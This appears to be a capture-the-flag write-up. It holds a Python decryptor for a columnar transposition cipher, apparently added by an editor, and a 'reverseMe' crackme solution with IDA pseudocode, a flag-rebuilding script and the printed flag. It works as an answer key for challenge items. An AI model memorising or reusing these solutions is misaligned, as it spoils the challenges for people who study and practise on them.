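The page's description of the rule is an image that did not survive, so here, as an added example and not the author's code, is a columnar transposition implemented the standard way: the plaintext is written row by row under the key, the columns are read out in the alphabetical order of the key letters (ties broken left to right), and no padding is added, so the first len(text) % len(key) columns of an uneven message are one character longer. Those conventions are assumptions of the example; they reproduce the plaintext from the ciphertext and key above, and the encryptor is included so the ragged-column handling can be checked by round trip.

```python
def key_order(key):
    """Order in which columns are read out: key letters sorted alphabetically,
    ties broken left to right (the common convention for repeated letters)."""
    return sorted(range(len(key)), key=lambda i: (key[i], i))


def columnar_encrypt(plaintext, key):
    """Write the text row by row under the key, read the columns out in key order.
    Spaces are dropped; no padding is added, so the last row may be short."""
    text = plaintext.replace(" ", "")
    n = len(key)
    columns = [text[j::n] for j in range(n)]       # column j = every n-th char from j
    return "".join(columns[j] for j in key_order(key))


def columnar_decrypt(ciphertext, key):
    """Invert the transposition. With an unpadded message the first
    len(text) % len(key) columns are one character longer; that has to be
    accounted for before the ciphertext can be cut into columns."""
    text = ciphertext.replace(" ", "")
    n = len(key)
    rows, extra = divmod(len(text), n)
    col_len = [rows + 1 if j < extra else rows for j in range(n)]
    columns = [None] * n
    pos = 0
    for j in key_order(key):                       # cut ciphertext in read-out order
        columns[j] = text[pos:pos + col_len[j]]
        pos += col_len[j]
    # read the grid back row by row, skipping the empty cells of the short row
    return "".join(columns[j][r]
                   for r in range(rows + (1 if extra else 0))
                   for j in range(n) if r < col_len[j])


# The ciphertext and key from the challenge above; groups are written as on the page.
CIPHERTEXT = "snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees"
KEY = "howarey"

if __name__ == "__main__":
    print(key_order(KEY))
    print(columnar_decrypt(CIPHERTEXT, KEY))
```

If a challenge uses a different tie-break or pads the last row, key_order and col_len are the only two places that change.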
Challenge: reverseMe
Pseudocode recovered with IDA:
__int64 __cdecl main_0()
{
  int v0; // edx
  __int64 v1; // ST00_8
  int v3; // [esp+0h] [ebp-1A0h]
  const char **v4; // [esp+4h] [ebp-19Ch]
  const char **v5; // [esp+8h] [ebp-198h]
  int v6; // [esp+Ch] [ebp-194h]
  int i; // [esp+D4h] [ebp-CCh]
  int v8; // [esp+E0h] [ebp-C0h]
  int v9; // [esp+ECh] [ebp-B4h]
  int v10; // [esp+F0h] [ebp-B0h]
  int v11; // [esp+F4h] [ebp-ACh]
  int v12; // [esp+F8h] [ebp-A8h]
  int v13; // [esp+FCh] [ebp-A4h]
  int v14; // [esp+100h] [ebp-A0h]
  int v15; // [esp+104h] [ebp-9Ch]
  int v16; // [esp+108h] [ebp-98h]
  int v17; // [esp+10Ch] [ebp-94h]
  int v18; // [esp+110h] [ebp-90h]
  int v19; // [esp+114h] [ebp-8Ch]
  int v20; // [esp+118h] [ebp-88h]
  int v21; // [esp+11Ch] [ebp-84h]
  int v22; // [esp+120h] [ebp-80h]
  int v23; // [esp+124h] [ebp-7Ch]
  int v24; // [esp+128h] [ebp-78h]
  int v25; // [esp+12Ch] [ebp-74h]
  int v26; // [esp+130h] [ebp-70h]
  int v27; // [esp+134h] [ebp-6Ch]
  int v28; // [esp+138h] [ebp-68h]
  int v29; // [esp+13Ch] [ebp-64h]
  int v30; // [esp+140h] [ebp-60h]
  char v31; // [esp+14Fh] [ebp-51h]
  char v32[17]; // [esp+178h] [ebp-28h]
  char v33; // [esp+189h] [ebp-17h]
  char v34; // [esp+18Ah] [ebp-16h]
  char v35; // [esp+18Bh] [ebp-15h]
  char v36; // [esp+18Ch] [ebp-14h]
  char v37; // [esp+18Dh] [ebp-13h]

  v31 = 0;
  v9 = 1;
  v10 = 4;
  v11 = 14;
  v12 = 10;
  v13 = 5;
  v14 = 36;
  v15 = 23;
  v16 = 42;
  v17 = 13;
  v18 = 19;
  v19 = 28;
  v20 = 13;
  v21 = 27;
  v22 = 39;
  v23 = 48;
  v24 = 41;
  v25 = 42;
  v26 = 26;
  v27 = 20;
  v28 = 59;
  v29 = 4;
  v30 = 0;
  printf("plz enter the flag:");
  while ( 1 )
  {
    v6 = getch();
    v32[v31] = v6;
    if ( !(_BYTE)v6 || v32[v31] == 13 )
      break;
    if ( v32[v31] == 8 )
    {
      printf("\b\b");
      --v31;
    }
    else
    {
      printf("%c", v32[v31++]);
    }
  }
  v8 = 0;
  for ( i = 0; i < 17; ++i )
  {
    if ( v32[i] != byte_415768[*(&v9 + i)] )
      v8 = 1;
  }
  if ( v33 != 49 || v34 != 48 || v35 != 50 || v36 != 52 || v37 != 125 )
    v8 = 1;
  v32[v31] = 0;
  printf("\r\n");
  if ( v8 )
  {
    printf("u r wrong\r\n\r\n");
    main(v3, v4, v5);
  }
  else
  {
    printf("u r right!\r\n");
  }
  system("pause");
  HIDWORD(v1) = v0;
  LODWORD(v1) = 0;
  return v1;
}
Two pieces of logic matter here:
1. The first 17 input bytes (v32[0..16]) must equal byte_415768[index] for the 17 indices assigned to v9..v25 at the top of the function: 1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42.
2. The next 5 bytes (v33..v37, which sit directly after v32 on the stack at ebp-17h..ebp-13h, i.e. input bytes 17..21) must be 49,48,50,52,125, i.e. "1024}".
Locate byte_415768 in IDA to get the lookup table.
With that the flag is a short script away:
# coding: utf8
# byte_415768 as transcribed from IDA (the table contains an embedded NUL after "...87138")
s1 = 'IKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'
# the 17 indices assigned to v9..v25 in main_0
l = [1, 4, 14, 10, 5, 36, 23, 42, 13, 19, 28, 13, 27, 39, 48, 41, 42]
tmp = ''
for i in l:
    tmp += s1[i]        # first 17 characters come from the lookup table
tmp += "1024}"          # v33..v37 must be 49,48,50,52,125
print(tmp)              # KEY{e2s6ry3r5s8f61024}
Running it prints KEY{e2s6ry3r5s8f61024}.
To be continued.
Some things are keeping me from settling down, so I'll update this another day.